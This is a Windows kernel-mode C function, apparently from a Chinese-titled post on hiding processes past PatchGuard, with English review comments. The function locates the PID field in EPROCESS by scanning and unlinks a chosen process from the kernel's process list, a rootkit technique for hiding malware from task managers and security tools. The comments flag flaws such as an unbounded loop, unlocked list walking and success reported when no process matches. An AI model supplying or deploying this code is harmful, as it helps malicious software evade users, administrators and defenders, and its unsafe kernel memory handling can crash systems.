Windows10 Ring0下过PatchGuard隐藏进程

#include<ntifs.h>
#include <ntddk.h>
#include <stdio.h>
#include <stdlib.h>
#include<windef.h>
#include <winapifamily.h> 
#include <ntimage.h>
#include<wdm.h>
/* Redeclares a prototype that ntifs.h (included above) already provides; harmless but redundant. */
NTKERNELAPI NTSTATUS PsLookupProcessByProcessId(HANDLE ProcessId, PEPROCESS *Process);
/*
 * HideProcess - unlink the process object whose PID equals `PID` from the
 * doubly-linked process list that sits next to the PID field (direct kernel
 * object manipulation; no documented API is used).
 *
 * Layout discovery: the first loop collects three referenced EPROCESS pointers
 * for the first three PIDs >= 16 (stepping by 4) that PsLookupProcessByProcessId
 * accepts.  The second loop scans byte offsets 0x20..0x2FC in steps of 4 for a
 * 4-byte field that equals the known PID in all three objects; that offset is
 * taken as the PID field, and the list entry is assumed to sit exactly one
 * pointer after it.
 *
 * Return: STATUS_UNSUCCESSFUL when no common PID offset was found.
 *         STATUS_SUCCESS otherwise - including when no process with `PID`
 *         exists (the final return does not distinguish "not found" from
 *         "unlinked").
 *
 * NOTE(review): only the two Flink/Blink pointers of one list are modified;
 * the object itself stays allocated and intact, so any enumeration that does
 * not walk this particular list is unaffected by the unlink.
 * NOTE(review): the walk below holds no lock and takes no references on the
 * objects it visits; a concurrent process exit during the walk can free the
 * object being read.
 */
NTSTATUS HideProcess(LONG PID) {
	/* Byte offset of the PID field inside EPROCESS; 0 means "not found". */
	ULONG PID_OFFSET = 0;
	int idx = 0;
	ULONG pids[3];
	PEPROCESS eprocs[3];
	/*
	 * NOTE(review): the loop has no upper bound on i - it only stops once
	 * three lookups have succeeded.  If fewer than three succeed, i keeps
	 * growing until it overflows (signed overflow is UB).
	 */
	for (int i = 16; idx < 3; i += 4)
	{
		/* A successful lookup returns a referenced object; released below. */
		if (NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)i, &eprocs[idx])))
		{
			pids[idx] = i;
			idx++;
		}
	}
	/*
	 * Scan for an offset at which all three objects hold their own PID.
	 * Only 4 bytes are compared at each offset; presumably the PID field is
	 * pointer-sized on x64 and only its low half is checked - confirm.
	 */
	for (int i = 0x20; i < 0x300; i += 4)
	{
		if ((*(ULONG *)((UCHAR *)eprocs[0] + i) == pids[0])
			&& (*(ULONG *)((UCHAR *)eprocs[1] + i) == pids[1])
			&& (*(ULONG *)((UCHAR *)eprocs[2] + i) == pids[2]))
		{
			PID_OFFSET = i;
			break;
		}
	}

	/* Drop the references taken by PsLookupProcessByProcessId above. */
	ObDereferenceObject(eprocs[0]);
	ObDereferenceObject(eprocs[1]);
	ObDereferenceObject(eprocs[2]);
	if (PID_OFFSET == 0) {
		return STATUS_UNSUCCESSFUL;
	}
	/*
	 * Assumes the list entry immediately follows the PID field (one pointer
	 * later) - TODO confirm against the target build; nothing here validates it.
	 */
	ULONG LIST_OFFSET = PID_OFFSET;
	INT_PTR ptr;
	LIST_OFFSET += sizeof(ptr);
	/* PsGetCurrentProcess returns the caller's process without adding a reference. */
	PEPROCESS CurrentEPROCESS = PsGetCurrentProcess();
	PLIST_ENTRY CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
	PUINT32 CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
	/* NOTE(review): UINT32 compared with LONG - a negative PID is compared as unsigned. */
	if (*(UINT32 *)CurrentPID == PID) {
		PLIST_ENTRY Previous, Next;
		Previous = (CurrentList->Blink);
		Next = (CurrentList->Flink);
		/* Neighbours now bypass this entry. */
		Previous->Flink = Next;
		Next->Blink = Previous;
		/*
		 * &CurrentList->Flink is the entry's own address, so the entry now
		 * points at itself - presumably so a later removal of this entry does
		 * not touch the live list; confirm.
		 */
		CurrentList->Blink = (PLIST_ENTRY)&CurrentList->Flink;
		CurrentList->Flink = (PLIST_ENTRY)&CurrentList->Flink;
		return STATUS_SUCCESS;
	}
	/* Remember where the walk started so the circular list is traversed once. */
	PEPROCESS StartProcess = CurrentEPROCESS;
	/* Step to the next process: recover its object address from its list entry. */
	CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
	CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
	CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
	/* Stop when the walk arrives back at the starting process. */
	while ((ULONG_PTR)StartProcess != (ULONG_PTR)CurrentEPROCESS) {

		if (*(UINT32 *)CurrentPID == PID) {
			PLIST_ENTRY Previous, Next;
			Previous = (CurrentList->Blink);
			Next = (CurrentList->Flink);
			/* Same unlink as above: neighbours bypass the entry, entry points at itself. */
			Previous->Flink = Next;
			Next->Blink = Previous;
			CurrentList->Blink = (PLIST_ENTRY)&CurrentList->Flink;
			CurrentList->Flink = (PLIST_ENTRY)&CurrentList->Flink;
			return STATUS_SUCCESS;
		}
		/* Advance; no reference is taken on the object being stepped to. */
		CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
		CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
		CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
	}
	/* NOTE(review): full circle without a match still reports success. */
	return STATUS_SUCCESS;
}